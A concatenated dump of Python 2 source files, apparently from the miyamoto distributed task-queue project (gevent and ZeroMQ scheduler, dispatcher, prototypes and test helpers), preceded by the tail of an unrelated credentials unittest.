        self.new_credentials.save_credentials()
        test_credentials = Credentials("1244", "<EMAIL>")
        test_credentials.save_credentials()
        self.new_credentials.delete_credentials()
        self.assertEqual(len(Credentials.credentials_list), 1)

    def test_find_credentials_by_number(self):
        '''
        test to check if we can find a credentials entry by password
        '''
        self.new_credentials.save_credentials()
        # Fix: the original used test_credentials before defining it; use a
        # distinct password so the lookup is unambiguous.
        test_credentials = Credentials("5678", "<EMAIL>")
        test_credentials.save_credentials()
        found_credentials = Credentials.find_by_password("5678")
        self.assertEqual(found_credentials.email, test_credentials.email)

    def test_credentials_exists(self):
        '''
        test to check if we can return a Boolean if we cannot find the entry.
        '''
        self.new_credentials.save_credentials()
        test_credentials = Credentials("1244", "<EMAIL>")
        # Fix: the original called test_credentials.__call__() (not callable).
        test_credentials.save_credentials()
        credentials_exists = Credentials.credentials_exist("1244")
        self.assertTrue(credentials_exists)

    def test_display_all_credentials(self):
        '''
        method that returns a list of all credentials saved
        '''
        # Fix: the original referenced an undefined lowercase ``credentials``.
        self.assertEqual(Credentials.display_credentials(), Credentials.credentials_list)

    def test_copy_email(self):
        '''
        Test to confirm that we are copying the email address from a found credentials
        '''
        self.new_credentials.save_credentials()
        # Fix: copy_email looks entries up by password, not by email.
        Credentials.copy_email("1244")
        self.assertEqual(self.new_credentials.email, pyperclip.paste())
if __name__ == '__main__':
unittest.main()
|
progrium/miyamoto | setup.py | <reponame>progrium/miyamoto<gh_stars>1-10
#!/usr/bin/env python
from setuptools import setup
setup(
name='miyamoto',
version='0.1',
author='<NAME>',
author_email='<EMAIL>',
description='task queue',
packages=['miyamoto'],
scripts=[],
install_requires=['gevent', 'httplib2'],
data_files=[
#('/etc/init.d', ['init.d/realtime']),
]
)
|
progrium/miyamoto | miyamoto/task.py | import base64
import cPickle
import json
import time
import urllib
import urllib2
import urlparse
import uuid
import gevent
class Task(object):
    # A scheduled HTTP callback task parsed from an enqueue request body.
    # Supports JSON and form-encoded bodies; "countdown" (seconds from now)
    # and "eta" (absolute unix time) control when the task fires, and the
    # replica fields stagger redundant copies across hosts.
    # (Python 2 codebase: cPickle/urlparse — no annotations added.)
    def __init__(self, queue_name, content_type, body):
        self.queue_name = queue_name
        if content_type == 'application/json':
            data = json.loads(body)
            self.url = data['url']
            self.method = data.get('method', 'POST')
            countdown = data.get('countdown')
            self.eta = data.get('eta')
            self.params = data.get('params', {})
        elif content_type == 'application/x-www-form-urlencoded':
            # Form fields are namespaced with a "task." prefix; everything
            # else becomes dispatch params. parse_qs yields lists, hence [0].
            data = urlparse.parse_qs(body)
            self.url = data['task.url'][0]
            self.method = data.get('task.method', ['POST'])[0]
            countdown = data.get('task.countdown', [None])[0]
            self.eta = data.get('task.eta', [None])[0]
            self.params = dict([(k,v[0]) for k,v in data.items() if not k.startswith('task.')])
        else:
            raise NotImplementedError("content type not supported")
        if countdown and not self.eta:
            # countdown is relative; convert it to an absolute eta timestamp.
            self.eta = int(time.time()+int(countdown))
        self.id = str(uuid.uuid4()) # vs time.time() is about 100 req/sec slower
        self.replica_hosts = []
        self.replica_offset = 0
        self._greenlet = None
        self._serialize_cache = None

    def time_until(self):
        # Seconds until this task should fire: never negative, and always
        # padded by replica_offset so replicas fire after the primary.
        if self.eta:
            countdown = int(int(self.eta) - time.time())
            if countdown < 0:
                return self.replica_offset
            else:
                return countdown + self.replica_offset
        else:
            return self.replica_offset

    def schedule(self, dispatcher):
        # Arrange for dispatcher.dispatch(self) after the computed delay.
        self._greenlet = gevent.spawn_later(self.time_until(), dispatcher.dispatch, self)

    def reschedule(self, dispatcher, eta):
        # Cancel the pending greenlet and schedule again with a new eta.
        self.cancel()
        self.eta = eta
        self.schedule(dispatcher)

    def cancel(self):
        # NOTE(review): assumes schedule() was called first; _greenlet is None
        # otherwise and kill() would raise AttributeError.
        self._greenlet.kill()

    def serialize(self):
        # Cached base64(pickle) wire form used when replicating to peers.
        if self._serialize_cache:
            return self._serialize_cache
        else:
            return base64.b64encode(cPickle.dumps(self, cPickle.HIGHEST_PROTOCOL))

    @classmethod
    def unserialize(cls, data):
        # Inverse of serialize(); keeps the original bytes as the cache so a
        # re-serialize is free.
        task = cPickle.loads(base64.b64decode(data))
        task._serialize_cache = data
        return task
progrium/miyamoto | miyamoto/scheduler.py | <filename>miyamoto/scheduler.py
import gevent.monkey; gevent.monkey.patch_all()
import socket
import time
import gevent
import gevent.server
import gevent.socket
import gevent.queue
from cluster import ClusterManager
from dispatcher import DispatchClient
from task import Task
import util
import constants
# Raised when a task could not be replicated to (and acked by) enough peers.
class ScheduleError(Exception): pass
class DistributedScheduler(object):
def __init__(self, queue, leader, replica_factor=2, replica_offset=5, interface=None,
port=6001, cluster_port=6000):
if interface is None:
interface = socket.gethostbyname(socket.gethostname())
self.interface = interface
self.port = port
self.dispatcher = DispatchClient(interface, self._dispatcher_event)
self.cluster = ClusterManager(leader, callback=self._cluster_update,
interface=interface, port=cluster_port)
self.backend = gevent.server.StreamServer((interface, port), self._backend_server)
self.peers = set()
self.connections = {}
self.queue = queue
self.scheduled = {}
self.scheduled_acks = {}
self.schedules = 0
self.replica_factor = replica_factor
self.replica_offset = replica_offset
def start(self):
self.dispatcher.start()
self.backend.start()
self.cluster.start()
def schedule(self, task):
host_list = list(self.peers)
# This implements the round-robin N replication method for picking
# which hosts to send the task. In short, every schedule moves along the
# cluster ring by one, then picks N hosts, where N is level of replication
replication_factor = min(self.replica_factor, len(host_list))
host_ids = [(self.schedules + n) % len(host_list) for n in xrange(replication_factor)]
hosts = [host_list[id] for id in host_ids]
task.replica_hosts = hosts
self.scheduled_acks[task.id] = gevent.queue.Queue()
for host in hosts:
self.connections[host].send('schedule:%s\n' % task.serialize())
task.replica_offset += self.replica_offset
try:
# TODO: document, wrap this whole operation in timeout
return all([self.scheduled_acks[task.id].get(timeout=2) for h in hosts])
except gevent.queue.Empty:
raise ScheduleError("not all hosts acked")
finally:
self.schedules += 1
self.scheduled_acks.pop(task.id)
def _cluster_update(self, hosts):
add_hosts = hosts - self.peers
remove_hosts = self.peers - hosts
for host in remove_hosts:
print "disconnecting from peer %s" % host
gevent.spawn(self._remove_peer, host)
for host in add_hosts:
print "connecting to peer %s" % (host)
gevent.spawn(self._add_peer, host)
self.peers = hosts
def _add_peer(self, host):
client = gevent.socket.create_connection((host, self.port), source_address=(self.interface, 0))
self.connections[host] = client
for line in util.line_protocol(client):
ack, task_id = line.split(':', 1)
if ack == 'scheduled' and task_id in self.scheduled_acks:
self.scheduled_acks[task_id].put(True)
print "disconnected from peer %s" % host
self._remove_peer(host)
def _remove_peer(self, host):
if host in self.connections:
peer = self.connections.pop(host)
try:
peer.shutdown(0)
except:
pass
def _dispatcher_event(self, event, payload):
if event == 'start':
task = self.scheduled[payload]
eta = int(time.time() + constants.WORKER_TIMEOUT)
self._sendto_replicas(task, 'reschedule:%s:%s\n' % (task.id, eta))
elif event == 'success':
task = self.scheduled[payload]
self._sendto_replicas(task, 'cancel:%s\n' % task.id)
self.scheduled.pop(task.id)
elif event == 'failure':
task_id, reason = payload.split(':', 1)
self.scheduled.pop(task.id)
print "FAILURE %s: %s" % (task_id, reason)
def _sendto_replicas(self, task, message):
other_replica_hosts = set(task.replica_hosts) - set([self.interface])
for host in other_replica_hosts:
if host in self.connections:
self.connections[host].send(message)
def _backend_server(self, socket, address):
for line in util.line_protocol(socket):
action, payload = line.split(':', 1)
if action == 'schedule':
task = Task.unserialize(payload)
task.schedule(self.dispatcher)
self.scheduled[task.id] = task
socket.send('scheduled:%s\n' % task.id)
print "scheduled: %s" % task.id
elif action == 'cancel':
task_id = payload
print "canceled: %s" % task_id
self.scheduled.pop(task_id).cancel()
elif action == 'reschedule':
task_id, eta = payload.split(':', 1)
eta = int(eta)
print "rescheduled: %s for %s" % (task_id, eta)
self.scheduled[task_id].reschedule(self.dispatcher, eta)
|
progrium/miyamoto | miyamoto/constants.py | <filename>miyamoto/constants.py
# Ports and tuning defaults shared across miyamoto components.
DEFAULT_CLUSTER_PORT = 6000      # ClusterManager membership/keepalive port
DEFAULT_FRONTEND_PORT = 8088     # HTTP enqueue frontend port
DEFAULT_BACKEND_PORT = 6001      # scheduler peer-to-peer replication port
DEFAULT_REPLICA_FACTOR = 2       # how many nodes hold a copy of each task
DEFAULT_REPLICA_SECS_OFFSET = 5  # extra delay per replica before it fires
WORKER_TIMEOUT = 5               # seconds a worker may run before replicas reschedule
progrium/miyamoto | attic/zmq_prototype/fabfile.py | import os
import os.path
import sys
import time
import boto
from fabric.api import *
# EC2 provisioning helpers driven by Fabric.
ami = 'ami-9c9f6ef5'   # image to boot test instances from
key_name = 'progrium'  # EC2 keypair used for ssh access
conn = boto.connect_ec2()
#if os.path.exists('hosts'):
#    f = open('hosts', 'r')
#    env.roledefs = f.read()
def start():
    """Boot an instance of `ami`, wait for it to leave 'pending', then
    point fabric's host list at it."""
    reservation = conn.get_image(ami).run(key_name=key_name)
    instance = reservation.instances[0]
    while instance.update() == 'pending':
        # poll EC2 once a second, printing progress dots
        sys.stdout.write('.')
        sys.stdout.flush()
        time.sleep(1)
    env.hosts = ['root@%s' % instance.public_dns_name]
    # NOTE(review): fixed sleep presumably waits for sshd to come up -- confirm
    time.sleep(60)
def touch():
    """Smoke-test remote execution by touching a file on the host."""
    run("touch testfile")
|
progrium/miyamoto | attic/zmq_prototype/utils.py | <gh_stars>1-10
from zmq import devices
import collections
import time
import operator
import memcache
def cluster(spec):
    """Resolve an "address/key" spec: fetch the comma-separated host list
    stored in memcache at `address` under `key`."""
    address, key = spec.split('/')
    return memcache.Client([address]).get(key).split(',')
def elect(client, name, candidate, ttl=60):
    """ Simple leader election-esque distributed selection method

    Tries to append this candidate to an existing membership record under
    `name`; if the record does not exist yet, tries to create it with this
    candidate as the first (elected) member.

    Returns True only when this candidate created the record, i.e. won.
    """
    # BUG FIX: the original built the value with ',%' % cadidate -- a broken
    # format string AND a misspelled, undefined name, raising at call time.
    if not client.append(name, ',%s' % candidate, time=ttl):
        if client.add(name, candidate, time=ttl):
            return True
        else:
            return False
    else:
        return False
class SampledRate(object):
    """Tool for pushing rate over time data"""
    def __init__(self, frequency=1, resolution=1, parent=None, callback=None, name=None):
        """ frequency: Rate update frequency in seconds
            resolution: Interval to average data over in seconds
            parent: Another SampledRate that ticks will propagate to
            callback: Optional callback when frequency is updated"""
        self.frequency = frequency
        self.resolution = resolution
        self.parent = parent
        self.callback = callback
        self.samples = collections.defaultdict(int)  # time bucket -> tick count
        self.ticks = 0           # ticks since the last rate update
        self.last_start = None   # start of the current sampling window
        self.last_value = 0      # most recently computed rate
        if not name and parent:
            # inherit the display name from the parent rate
            self.name = parent.name
        else:
            self.name = name
    def _update(self):
        # Recompute the rate once the window is older than `frequency` seconds.
        if self.last_start and int(time.time() - self.last_start) > self.frequency:
            # Add empty samples
            # NOTE(review): range() needs an int -- a float `frequency`
            # (as used by sampler.py) would raise here; confirm intent.
            for x in range(self.frequency-len(self.samples)):
                self.samples[x] = 0
            # `reduce` is the Python 2 builtin here
            self.last_value = reduce(operator.add, self.samples.values()) / self.resolution / self.frequency
            self.last_start = int(time.time())
            if self.callback:
                # reactor.callLater(0, self.callback, self.last_value, self.ticks)
                self.callback(self.last_value, self.ticks)
            self.ticks = 0
            self.samples = collections.defaultdict(int)
    def tick(self, ticks=1):
        """Record `ticks` events now; propagates to parent. Returns self."""
        if not self.last_start:
            self.last_start = int(time.time())
        self._update()
        if self.parent:
            self.parent.tick(ticks)
        self.samples[int(time.time() / self.resolution)] += ticks
        self.ticks += ticks
        return self
    def getvalue(self):
        """Return the current rate, refreshing the window first."""
        self._update()
        return self.last_value
    def __int__(self):
        return self.getvalue()
    def __str__(self):
        # Okay, hardcoding 1 sec resolutions for now
        return "%i %s/sec" % (self.getvalue(), self.name or 'ticks')
    def __repr__(self):
        return "<SampledRate: %i avg/%is updated/%is>" % (self.getvalue(), self.frequency, self.resolution)
class Device(devices.ThreadDevice):
    """ThreadDevice variant that builds its sockets from a caller-supplied
    zmq context instead of creating its own."""
    def __init__(self, type, in_type, out_type, ctx):
        self._context = ctx
        devices.ThreadDevice.__init__(self, type, in_type, out_type)
    def _setup_sockets(self):
        # create the sockets
        ins = self._context.socket(self.in_type)
        if self.out_type < 0:
            # negative out_type: reuse the input socket for output
            outs = ins
        else:
            outs = self._context.socket(self.out_type)
        # set sockopts (must be done first, in case of zmq.IDENTITY)
        for opt,value in self._in_sockopts:
            ins.setsockopt(opt, value)
        for opt,value in self._out_sockopts:
            outs.setsockopt(opt, value)
        # then apply queued binds and connects for each side
        for iface in self._in_binds:
            ins.bind(iface)
        for iface in self._out_binds:
            outs.bind(iface)
        for iface in self._in_connects:
            ins.connect(iface)
        for iface in self._out_connects:
            outs.connect(iface)
        return ins,outs
progrium/miyamoto | attic/zmq_prototype/perf.py | <filename>attic/zmq_prototype/perf.py
import sys
import os
import eventlet
import uuid
import time
import random
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
from zmq import devices
import memcache
import utils
use_hub('zeromq')
task = sys.argv[1]
nodes = utils.cluster(sys.argv[2])
ctx = zmq.Context()
messages = []
def stopped(count, td):
    """Print message count, elapsed seconds, and messages/sec, then exit."""
    print count
    print td
    print 1/(td/count)
    sys.exit(0)
def enqueuer(n):
    """Push n synthetic jobs through the frontend REQ socket, recording each."""
    frontend = ctx.socket(zmq.REQ)
    for node in nodes:
        frontend.connect('tcp://%s:7000' % node)
    for m in range(n):
        job = '%s::{"job":%s}' % (random.random(), time.time())
        frontend.send(job)
        resp = frontend.recv()
        messages.append(job)
        #print resp
def dequeuer():
    """Drain jobs from the dispatchers, acking each; report and exit after
    5 seconds of inactivity."""
    dispatcher = ctx.socket(zmq.PULL)
    finisher = ctx.socket(zmq.PUB)
    for node in nodes:
        dispatcher.connect('tcp://%s:8000' % node)
        finisher.connect('tcp://%s:9000' % node)
    timeout = None
    t1 = None
    while True:
        id, job = dispatcher.recv().split(':', 1)
        if not timeout is None:
            # still receiving; push the idle-exit timer back
            timeout.cancel()
        if not t1:
            # clock starts at the first received message
            t1 = time.time()
        messages.append(job)
        finisher.send(id)
        td = time.time() - t1
        timeout = eventlet.spawn_after(5, stopped, len(messages), td)
try:
    if task == 'enqueue':
        size = int(os.environ.get('MESSAGES', 10000))
        t1 = time.time()
        eventlet.spawn_n(enqueuer, size)
        while len(messages) < size:
            eventlet.sleep(0.1)
        td = time.time() - t1
        stopped(len(messages), td)
    elif task == 'dequeue':
        eventlet.spawn_n(dequeuer)
        while True:
            eventlet.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
    sys.exit(0)
progrium/miyamoto | miyamoto/tests/__init__.py | import socket
import gevent
import gevent.event
import gevent.pywsgi
from miyamoto import start
def _unused_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
class Cluster(object):
    """Test helper that runs a local miyamoto cluster on loopback aliases
    (127.0.0.1, 127.0.0.2, ...); node 1 is the leader."""
    def __init__(self, size=2, replica_factor=2):
        self.size = size                      # nodes started by start()
        self.replica_factor = replica_factor  # replication level per task
        self.nodes = []                       # running node handles
        self.leader = '127.0.0.1'
    def start(self, wait=True):
        """Start `size` nodes, optionally blocking until all are ready."""
        for n in xrange(self.size):
            self.add(False)
        if wait:
            for node in self.nodes:
                node.ready.wait()
    def stop(self):
        """Terminate all nodes and reset the roster."""
        for node in self.nodes:
            node.terminate()
        self.nodes = []
    def add(self, wait=True):
        """Start one more node on the next loopback alias; returns it."""
        interface = '127.0.0.%s' % (len(self.nodes)+1)
        node = start(self.leader, self.replica_factor, interface)
        self.nodes.append(node)
        if wait:
            node.ready.wait()
        return node
    def __len__(self):
        return len(self.nodes)
class TaskCountdown(object):
    """Throwaway HTTP endpoint that counts down hits from dispatched tasks
    and sets an event once `count` requests have arrived."""
    def __init__(self, count=1):
        self.count = count  # remaining hits before `done` is set
        self.server = gevent.pywsgi.WSGIServer(('', _unused_port()), self._app, log=None)
        self.done = gevent.event.Event()
    def start(self, count=None):
        """Start serving; returns the URL tasks should hit."""
        if count:
            self.count = count
        self.server.start()
        self.url = 'http://%s:%s' % (self.server.server_host, self.server.server_port)
        return self.url
    def wait(self, timeout=None):
        self.done.wait(timeout)
    def finished(self):
        return self.done.isSet()
    def _app(self, env, start_response):
        # each request decrements; at zero, signal done and stop serving
        self.count -= 1
        if self.count <= 0:
            self.done.set()
            self.server.kill()
        start_response("200 OK", {})
        return ['ok']
|
progrium/miyamoto | attic/zmq_prototype/http.py | import cgi
import sys
import eventlet
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
from eventlet import wsgi
import utils
use_hub('zeromq')
port = int(sys.argv[1])
nodes = utils.cluster(sys.argv[2])
ctx = zmq.Context()
pool = []
for n in range(2):
enqueuer = ctx.socket(zmq.REQ)
for node in nodes:
print "Connecting to %s..." % node
enqueuer.connect('tcp://%s:7000' % node)
pool.append(enqueuer)
def enqueue(env, start_response):
    """WSGI app: forward the request body to a queue node, failing over
    across the socket pool until one responds.

    Replies 200 when the node reports "stored", 503 otherwise.
    """
    # BUG FIX: read the body once up front -- the original re-read the
    # already-consumed wsgi.input inside the retry loop, so every retry
    # sent an empty body.
    body = env['wsgi.input'].read()
    for n in range(len(pool)):
        try:
            pool[n].send(body)
            resp = pool[n].recv()
            if 'stored' in resp:
                start_response('200 OK', [('Content-Type', 'text/plain')])
            else:
                start_response('503 Error', [('Content-Type', 'text/plain')])
            return ['%s\r\n' % resp]
        except:
            # this socket failed; try the next one in the pool
            pass
    # BUG FIX: `resp` was unbound here when every send failed (NameError);
    # return a definite error body instead.
    start_response('503 Error', [('Content-Type', 'text/plain')])
    return ['failure\r\n']
wsgi.server(eventlet.listen(('', port)), enqueue) |
progrium/miyamoto | miyamoto/__init__.py | <reponame>progrium/miyamoto
import os
import logging
import multiprocessing
import threading
import json
import sys
from gevent_zeromq import zmq
import gevent
import httplib2
from miyamoto.queue import QueueServer
from miyamoto.dispatcher import Dispatcher
from miyamoto import constants
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler(sys.stdout))
class _MiyamotoNode(object):
    """One miyamoto node: an enqueuer (queue server) process plus a
    dequeuer (dispatcher) process, managed together."""
    def __init__(self, leader, replicas, interface, mode=multiprocessing):
        self.leader = leader
        self.replicas = replicas
        self.interface = interface
        self.ready = multiprocessing.Event()  # set once the queue server is up
        self.pool = []       # child processes
        self.running = False
    def start(self):
        """Start both child processes (no-op if already running)."""
        if not self.running:
            self._start_dequeuer()
            self._start_enqueuer()
            self.running = True
    def join(self):
        for process in self.pool:
            process.join()
    def terminate(self, block=True):
        """Terminate children, optionally waiting until each has exited."""
        for process in self.pool:
            process.terminate()
            while block and process.is_alive():
                gevent.sleep()
    def enqueue(self, queue_name, task):
        """POST a task dict to this node's HTTP frontend; True on HTTP 200."""
        url = 'http://%s:%s/%s' % (self.interface, constants.DEFAULT_FRONTEND_PORT, queue_name)
        headers = {'Content-Type': 'application/json'}
        http = httplib2.Http()
        resp, content = http.request(url, method='POST', headers=headers, body=json.dumps(task))
        print ">", resp, content
        if resp['status'] == '200':
            return True
        else:
            return False
    def _start_enqueuer(self):
        # the queue server runs in its own process and signals self.ready
        def enqueuer():
            gevent.sleep(1)
            server = QueueServer(self.leader, replica_factor=self.replicas, interface=self.interface)
            if self.ready:
                server._ready_event = self.ready
            server.start()
        process = multiprocessing.Process(target=enqueuer, name='enqueuer')
        process.start()
        self.pool.append(process)
    def _start_dequeuer(self):
        # the dispatcher runs in its own process with a private zmq context
        def dequeuer():
            context = zmq.Context()
            dispatcher = Dispatcher(self.interface, context)
            dispatcher.start()
        process = multiprocessing.Process(target=dequeuer, name='dequeuer')
        process.start()
        self.pool.append(process)
def start(leader, replicas, interface=None):
    """Create and start a miyamoto node; returns the node handle."""
    logger.info("Starting Miyamoto...")
    m = _MiyamotoNode(leader, replicas, interface)
    m.start()
    return m
progrium/miyamoto | scripts/start.py | <reponame>progrium/miyamoto
import sys
import os
from miyamoto import start
# Node launcher: configuration comes from the environment.
interface = os.environ.get('INTERFACE')        # address to bind this node to
leader = os.environ.get('LEADER', interface)   # cluster leader (self if first node)
replicas = int(os.environ.get('REPLICAS', 2))  # replication factor
print "%s: Using leader %s..." % (interface, leader)
start(leader, replicas, interface)
|
progrium/miyamoto | attic/zmq_prototype/sampler.py | <filename>attic/zmq_prototype/sampler.py
import sys
import os
import eventlet
import time
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
import utils
use_hub('zeromq')
ctx = zmq.Context()
nodes = utils.cluster(sys.argv[1])
def sampler(rate):
    """Consume jobs from the cluster dispatchers, ticking `rate` once per
    job and acking each job to the finisher."""
    dispatcher = ctx.socket(zmq.PULL)
    finisher = ctx.socket(zmq.PUB)
    for node in nodes:
        dispatcher.connect("tcp://%s:8000" % node)
        finisher.connect("tcp://%s:9000" % node)
    while True:
        id, job = dispatcher.recv().split(':', 1)
        rate.tick()
        finisher.send(id)
def redraw(v, t):
    """SampledRate callback: clear the terminal and show the latest sample."""
    os.system("clear")
    print "Last sample: %s messages/sec" % v
try:
    rate = utils.SampledRate(0.5, 3, callback=redraw, name='messages')
    eventlet.spawn_n(sampler, rate)
    while True:
        eventlet.sleep(1)
except (KeyboardInterrupt, SystemExit):
    print "Exiting."
progrium/miyamoto | attic/zmq_prototype/debug.py | import sys
import eventlet
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
import utils
use_hub('zeromq')
ctx = zmq.Context()
nodes = utils.cluster(sys.argv[1])
def worker():
    """Debug consumer: print every job received from the dispatchers and
    ack it to the finisher."""
    dispatcher = ctx.socket(zmq.PULL)
    finisher = ctx.socket(zmq.PUB)
    for node in nodes:
        dispatcher.connect('tcp://%s:8000' % node)
        finisher.connect('tcp://%s:9000' % node)
    while True:
        id, job = dispatcher.recv().split(':', 1)
        print job
        finisher.send(id)
try:
    eventlet.spawn_n(worker)
    while True: eventlet.sleep(1)
except (KeyboardInterrupt, SystemExit):
    print "Exiting."
progrium/miyamoto | scripts/worker.py | from gevent import wsgi
import gevent
def outputter(env, start):
    """Debug WSGI worker endpoint: dump the environ and reply 'ok'."""
    print env
    #gevent.sleep(4)
    start('200 OK', {})
    return ["ok"]
print 'Serving on 8080...'
wsgi.WSGIServer(('', 8080), outputter).serve_forever() |
progrium/miyamoto | attic/zmq_prototype/bigtest.py |
# spawn workers
# initiate restiator (pointed to http.py)
# show enqueue rate, sent count
# wait for results from workers
# show dequeue rate, received count
# show aggregated throughput rate (noting concurrency) |
progrium/miyamoto | miyamoto/service.py | <filename>miyamoto/service.py<gh_stars>1-10
import gevent
import gevent.baseserver
import gevent.event
import gevent.pool
READY = True  # sentinel a _start() may return to mean "ready immediately"
class Service(object):
    """Service interface for creating standalone or composable services
    This is similar to a subset of the gevent baseserver interface (intentional)
    so that you can treat them as children services.
    """
    stop_timeout = 1   # seconds stop() waits for greenlets before killing them
    ready_timeout = 2  # seconds start() blocks waiting for readiness
    def __init__(self):
        self._stopped_event = gevent.event.Event()
        self._ready_event = gevent.event.Event()
        self._children = []  # nested Services / gevent servers
        self._greenlets = gevent.pool.Group()
        self.started = False
    @property
    def ready(self):
        return self._ready_event.isSet()
    def spawn(self, *args, **kwargs):
        # spawn into the service's group so stop() can reap them
        self._greenlets.spawn(*args, **kwargs)
    def start(self, block_until_ready=True):
        """Start children, then this service; on error stop and re-raise."""
        assert not self.started, '%s already started' % self.__class__.__name__
        self._stopped_event.clear()
        self._ready_event.clear()
        try:
            for child in self._children:
                if isinstance(child, Service):
                    child.start(block_until_ready)
                elif isinstance(child, gevent.baseserver.BaseServer):
                    child.start()
            ready = self._start()
            if ready is True:
                self._ready_event.set()
            elif not ready and block_until_ready is True:
                # subclass signals readiness asynchronously; wait for it
                self._ready_event.wait(self.ready_timeout)
            self.started = True
        except:
            self.stop()
            raise
    def _start(self):
        raise NotImplementedError()
    def stop(self, timeout=None):
        """Stop accepting the connections and close the listening socket.
        If the server uses a pool to spawn the requests, then :meth:`stop` also waits
        for all the handlers to exit. If there are still handlers executing after *timeout*
        has expired (default 1 second), then the currently running handlers in the pool are killed."""
        self.started = False
        try:
            for child in self._children:
                child.stop()
            self._stop()
        finally:
            # cleanup always runs, even if a child's stop raised
            if timeout is None:
                timeout = self.stop_timeout
            if self._greenlets:
                self._greenlets.join(timeout=timeout)
                self._greenlets.kill(block=True, timeout=1)
            self._ready_event.clear()
            self._stopped_event.set()
    def _stop(self):
        raise NotImplementedError()
    def serve_forever(self, stop_timeout=None):
        """Start the service if it hasn't been already started and wait until it's stopped."""
        if not self.started:
            self.start()
        try:
            self._stopped_event.wait()
        except:
            self.stop(timeout=stop_timeout)
            raise
progrium/miyamoto | attic/zmq_prototype/core.py | import sys
import os
import eventlet
import uuid
import time
import json
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
from eventlet import wsgi
from zmq import devices
import memcache
import webob
from utils import Device
from cluster import ClusterNode
from agenda import Agenda
use_hub('zeromq')
interface = sys.argv[1]
cluster_address, cluster_key = sys.argv[2].split('/')
datastore = memcache.Client([cluster_address], debug=0)
ctx = zmq.Context()
cluster = ClusterNode(ctx, datastore, cluster_key, interface, ttl=10)
cluster.join()
agenda = Agenda(datastore, 'miyamoto-data')
dispatch_timeout = 60
# These need to have a max size
enqueued = set()
frontend = Device(zmq.QUEUE, zmq.XREP, zmq.XREQ, ctx)
frontend.bind_in('tcp://%s:7000' % interface)
frontend.bind_out('inproc://frontend-out')
print "Starting frontend on 7000..."
frontend.start()
enqueue_out = ctx.socket(zmq.PUSH)
# token::{task}
# :time:{task}
# token:time:{task}
# ::{task}
# {task}
def enqueuer():
    """REP worker: parse "token:time:{task}" messages off the frontend
    device and reply with a JSON status string."""
    incoming = ctx.socket(zmq.REP)
    incoming.connect('inproc://frontend-out')
    while True:
        msg = incoming.recv()
        # everything before the first '{' is the optional param prefix
        params, task = msg.split('{', 1)
        task = '{%s' % task
        if params:
            token, time, x = params.split(':')
        else:
            token = None
            time = None
        id = enqueue(task, time, token)
        if id:
            incoming.send('{"status":"stored", "id": "%s"}' % id)
        elif id == False:
            # enqueue() returns False for a duplicate dedup token
            incoming.send('{"status":"duplicate"}')
        else:
            incoming.send('{"status":"failure"}')
def enqueue(task, time=None, token=None):
    """Store a task in the datastore/agenda and push it to a dispatcher.

    Returns the new id on success, False for a duplicate token, or None
    when the store failed.
    """
    if token and token in enqueued:
        return False
    id = uuid.uuid4().hex
    if agenda.add(id, at=time or None) and datastore.set(id, task):
        if token:
            enqueued.add(token)
        enqueue_out.send_pyobj((id, task))
        return id
    else:
        return None
def dispatcher():
    """Pull stored tasks and push them to workers unless already dispatched."""
    incoming = ctx.socket(zmq.PULL)
    incoming.bind('tcp://%s:7050' % interface)
    incoming.bind('inproc://dispatcher-in')
    outgoing = ctx.socket(zmq.PUSH)
    print "Binding dispatcher on 8000..."
    outgoing.bind('tcp://%s:8000' % interface)
    while True:
        id, task = incoming.recv_pyobj()
        # the "<id>-dispatch" marker suppresses duplicate dispatches
        if not datastore.get('%s-dispatch' % id):
            outgoing.send("%s:%s" % (id, task))
            datastore.set('%s-dispatch' % id, dispatch_timeout)
def finisher():
    """Subscribe to worker acks and delete finished tasks from the store."""
    incoming = ctx.socket(zmq.SUB)
    incoming.setsockopt(zmq.SUBSCRIBE, "")
    print "Binding finisher on 9000..."
    incoming.bind('tcp://%s:9000' % interface)
    while True:
        id = incoming.recv()
        datastore.delete('%s-dispatch' % id)
        datastore.delete(id)
def control():
    """Placeholder loop for cluster control messages (unimplemented)."""
    while True:
        cmd, payload = cluster.control.recv().split(',')
        # ...
def web_enqueuer(env, start_response):
    """WSGI frontend for enqueue(): POST fields become the task body;
    the reserved _time/_token fields control scheduling and dedup."""
    req = webob.Request(env)
    task = dict(req.POST)
    # strip the control fields so they are not stored in the task body
    if '_time' in task:
        del task['_time']
    if '_token' in task:
        del task['_token']
    task = json.dumps(task)
    # enqueue() already pushes the task to the dispatcher.
    # BUG FIX: removed an unreachable `outgoing.send_pyobj((id, task))`
    # that sat after the success return and referenced an undefined name.
    id = enqueue(task, req.POST.get('_time'), req.POST.get('_token'))
    if id:
        start_response('200 OK', [('Content-Type', 'application/json')])
        return ['{"status":"stored", "id": "%s"}\n' % id]
    elif id == False:
        start_response('400 Bad request', [('Content-Type', 'application/json')])
        return ['{"status":"duplicate"}\n']
    else:
        start_response('500 Server error', [('Content-Type', 'application/json')])
        return ['{"status":"failure"}\n']
def setup_enqueue():
    """Wire enqueue_out to every node's dispatcher (inproc for ourselves),
    and keep wiring up new nodes as they join the cluster."""
    def connect(node):
        print "Enqueuer connecting to %s..." % node
        if node == interface:
            # local dispatcher: use the in-process transport
            enqueue_out.connect('inproc://dispatcher-in')
        else:
            enqueue_out.connect('tcp://%s:7050' % node)
    for node in cluster.all():
        connect(node)
    cluster.callbacks['add'].append(lambda x: map(connect,x))
try:
    # two enqueuer workers behind the frontend device, plus one dispatcher
    # and one finisher; the HTTP enqueuer serves in the main greenthread
    for n in range(2):
        eventlet.spawn_after(1, enqueuer)
    eventlet.spawn_n(dispatcher)
    eventlet.spawn_n(finisher)
    eventlet.spawn_after(1, setup_enqueue)
    wsgi.server(eventlet.listen((interface, 8080)), web_enqueuer)
    #while True:
    #    eventlet.sleep(1)
except (KeyboardInterrupt, SystemExit):
    print "Exiting..."
    cluster.leave()
    ctx.term()
progrium/miyamoto | miyamoto/tests/test_cluster.py | <filename>miyamoto/tests/test_cluster.py
import multiprocessing
import gevent
from nose import with_setup
from miyamoto.test import Cluster
from miyamoto.test import TaskCountdown
from miyamoto import constants
